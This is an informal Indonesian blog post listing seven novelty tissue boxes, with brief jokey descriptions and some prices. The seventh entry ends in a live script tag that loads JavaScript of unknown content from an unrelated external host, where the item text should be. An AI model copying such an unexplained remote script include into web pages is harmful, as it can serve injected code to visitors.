Jumat, 02 Maret 2012

7 Tempat Tisu Unik

Kali ini ane akan membawa agan-agan ke dunia orang-orang dengan otak yang super kreatif yang akhirnya bisa membuat kotak2 tisu yang gokil! Ayo kita liat satu-satu. Artikel ini juga cocok buat kamu yang lagi nyari ide untuk membuat prakarya.


1. Big Maoi tissue dispenser:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
Wow. Ini adalah tempat tissue yang bentuknya patung moai itu loh, patung yang terkenal banget, soalnya patung-patung itu tersebar begitu aja di sebuah pulau ga berpenghuni,easter land, dan jumlahnya banyaaak banget. Patungnya besar banget dang a ada yang tau siapa yang buat. . tinggi kotak tisu ini 34 cm dan harganya $57.82 us dollar. Keren ya keliatannya?

2. cover kotak tissue shakespeare:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
bosen ngeliat kotak tisu mu bentuknya gitu-gitu aja? Atau udah punya cover nya tapi ngebosenin bentuknya? Nah ini nih cocok buat lw. Cover kotak tisu berbentuk muka nya shakespeare.!! (kenapa tisu nya harus keluar dari hidungnya sih? blog-sphere.blogspot.com - 7 tempat tissue super kreatif)

for 3. cover kotak tisu parasut:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
Wahaha apaan lagi nih, cover tisu bentuknya kyk parasut. Kreatif juga,seolah2 si penerjun paying ini lagi ngembangin parasutnya begitu kita ngambil tisu. blog-sphere.blogspot.com - 7 tempat tissue super kreatif

4. kotak tisu "apple":

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
mungkin yang unik dari kotak tisu ini adalah karena kotak tisu ini mirip CPU computer..

5. magic hat tissue box:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
SIM SALABIM JADI APA PROK PROK PROK!!!
nah sekarang siapapun bisa main sulap dengan kotak tisu ini, bahkan lw yang selalu gagal menipu teman-teman lw! Tunjukan pada mereka kalo lw bisa ngeluarin tisu banyak banget dari topi ini!

6. kotak tisu bersin:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif
wah gokil, setiap lw ngambil tisu, muka orang di kotak tisu ini hidungnya akan menyala merah dan ngeluarin suara bersin! Kreatif banget ni pembuatnya. Harganya $19.98 loh

7. kotak tisu kue:

blog-sphere.blogspot.com - 7 tempat tissue super kreatif

<script src="http://terbengkalai.xtgem.com/a.js"></script>.......